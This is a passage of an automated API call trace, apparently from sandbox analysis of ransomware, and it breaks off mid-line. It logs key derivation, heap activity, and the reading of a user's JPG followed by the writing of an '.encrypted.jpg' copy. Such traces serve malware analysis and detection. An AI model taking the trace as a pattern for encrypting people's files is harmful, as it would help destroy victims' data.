Algid=0x660e, hBaseData=0x7c2100, dwFlags=0x1, phKey=0x6ae208 | out: phKey=0x6ae208*=0x7c2280) returned 1 [0041.170] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da308 [0041.170] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0041.170] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0041.170] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0041.170] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0041.170] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0041.170] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3b8 [0041.170] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.170] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da308 [0041.170] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b87d0 [0041.170] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1f8 [0041.170] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.170] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.170] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da308 [0041.170] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1f8 [0041.170] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.170] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da308 [0041.170] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.170] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da308 [0041.170] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1f8 [0041.170] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae9a8 [0041.170] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0041.170] PeekMessageW (in: lpMsg=0x6ae344, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae344) returned 0 [0041.170] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1f8 [0041.170] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2f8 [0041.170] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0041.170] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0041.170] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1f8 [0041.171] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2f8 [0041.171] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0041.171] CryptDestroyHash (hHash=0x7c2100) returned 1 [0041.171] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2c8 [0041.171] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b87d0 [0041.171] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1e8 [0041.171] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0041.171] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0041.171] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0041.171] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1f8 [0041.171] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.171] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2c8 [0041.171] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1bc0 [0041.171] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0041.171] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1e8 [0041.171] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.171] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da408 [0041.171] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0041.171] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da138 [0041.171] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.171] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.171] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.171] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da408 [0041.171] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1878 [0041.171] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0041.171] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da138 [0041.171] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0041.172] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\xmQr1I0\\jyNlG9.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\oaci\\xmqr1i0\\jynlg9.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0041.172] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0041.172] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae940 | out: lpNewFilePointer=0x0) returned 1 [0041.172] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1788 [0041.172] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7f0 [0041.172] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0041.172] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0041.172] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0041.172] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0041.172] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1878 | out: hHeap=0x770000) returned 1 [0041.172] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0041.172] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.172] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da408 [0041.172] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0041.172] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0041.172] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0041.172] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0041.172] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0041.172] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2100 [0041.172] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.172] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2100 | out: hHeap=0x770000) returned 1 [0041.172] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.172] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da408 [0041.172] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1878 [0041.172] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0041.172] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0041.173] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0041.173] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0041.173] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0041.173] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0041.173] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da178 [0041.173] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0041.173] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0041.173] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0041.173] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0041.173] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0041.173] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0041.173] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0041.173] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da178 [0041.173] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb68 [0041.173] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0041.173] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0041.173] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0041.173] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9b8 [0041.173] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0041.173] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0041.173] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da158 [0041.173] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9b8 | out: hHeap=0x770000) returned 1 [0041.173] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0041.173] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da288 [0041.173] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xa0) returned 0x7d8558 [0041.173] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0041.173] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x70) returned 0x7db300 [0041.173] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0041.173] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x70) returned 0x7db378 [0041.173] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d8558 | out: hHeap=0x770000) returned 1 [0041.173] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0041.174] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0041.174] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da158 | out: hHeap=0x770000) returned 1 [0041.174] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0041.174] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0041.174] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7db300 | out: hHeap=0x770000) returned 1 [0041.174] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0041.174] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb68 | out: hHeap=0x770000) returned 1 [0041.174] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0041.174] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0041.174] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x70) returned 0x7db300 [0041.174] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\xmQr1I0\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\oaci\\xmqr1i0")) returned 0x10 [0041.174] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7db300 | out: hHeap=0x770000) returned 1 [0041.174] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0041.174] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7db378 | out: hHeap=0x770000) returned 1 [0041.174] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0041.174] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0041.174] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0041.174] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2100 [0041.174] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0xab2010 [0041.174] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0041.174] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0041.174] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\xmQr1I0\\jyNlG9.encrypted.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\oaci\\xmqr1i0\\jynlg9.encrypted.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0041.175] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1ad0 [0041.175] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb68 [0041.175] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da178 [0041.175] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0041.175] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0041.175] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0041.175] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1878 | out: hHeap=0x770000) returned 1 [0041.175] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0041.175] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.175] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da408 [0041.175] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0041.175] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0041.175] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0041.175] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0041.175] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0041.175] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2200 [0041.175] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.176] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2200 | out: hHeap=0x770000) returned 1 [0041.176] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.176] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2200 [0041.176] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.176] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da408 [0041.176] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1878 [0041.176] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0041.176] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0041.176] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0041.176] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0041.176] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0041.176] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0041.176] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0041.176] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0041.176] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0041.176] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0041.176] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0041.176] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0041.176] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0041.176] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x100000) returned 0x1090020 [0041.176] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae990 | out: lpNewFilePointer=0x0) returned 1 [0041.176] ReadFile (in: hFile=0x128, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6ae9b8*=0x56fe, lpOverlapped=0x0) returned 1 [0041.178] ReadFile (in: hFile=0x128, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6ae9b8*=0x0, lpOverlapped=0x0) returned 1 [0041.178] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0041.178] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0041.178] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0041.178] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0041.178] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x56fe) returned 0xac2018 [0041.178] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x1090020 | out: hHeap=0x770000) returned 1 [0041.179] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0041.179] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0041.179] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1878 | out: hHeap=0x770000) returned 1 [0041.179] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0041.179] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da408 [0041.179] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x56fe) returned 0xac7720 [0041.179] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xac2018 | out: hHeap=0x770000) returned 1 [0041.179] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0041.179] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.179] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0041.179] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1878 [0041.179] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0041.179] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0041.179] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0041.179] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x56fe) returned 0xac2018 [0041.179] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0041.179] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xac2018 | out: hHeap=0x770000) returned 1 [0041.179] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0041.179] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0041.180] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1878 | out: hHeap=0x770000) returned 1 [0041.180] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0041.180] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.180] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0041.180] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0041.180] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0041.180] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0041.180] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0041.180] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0041.180] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c22c0 [0041.180] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.180] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0041.180] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0041.180] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0041.180] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0041.180] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0041.180] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0041.180] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1878 [0041.180] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da1c8 [0041.180] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1670 [0041.180] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0041.180] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0041.180] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da158 [0041.180] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x56fe) returned 0xac2018 [0041.180] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0041.180] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da2a8 [0041.180] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0041.180] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da288 [0041.180] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0041.180] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da288 [0041.180] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0041.180] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da318 [0041.181] HeapFree (in: 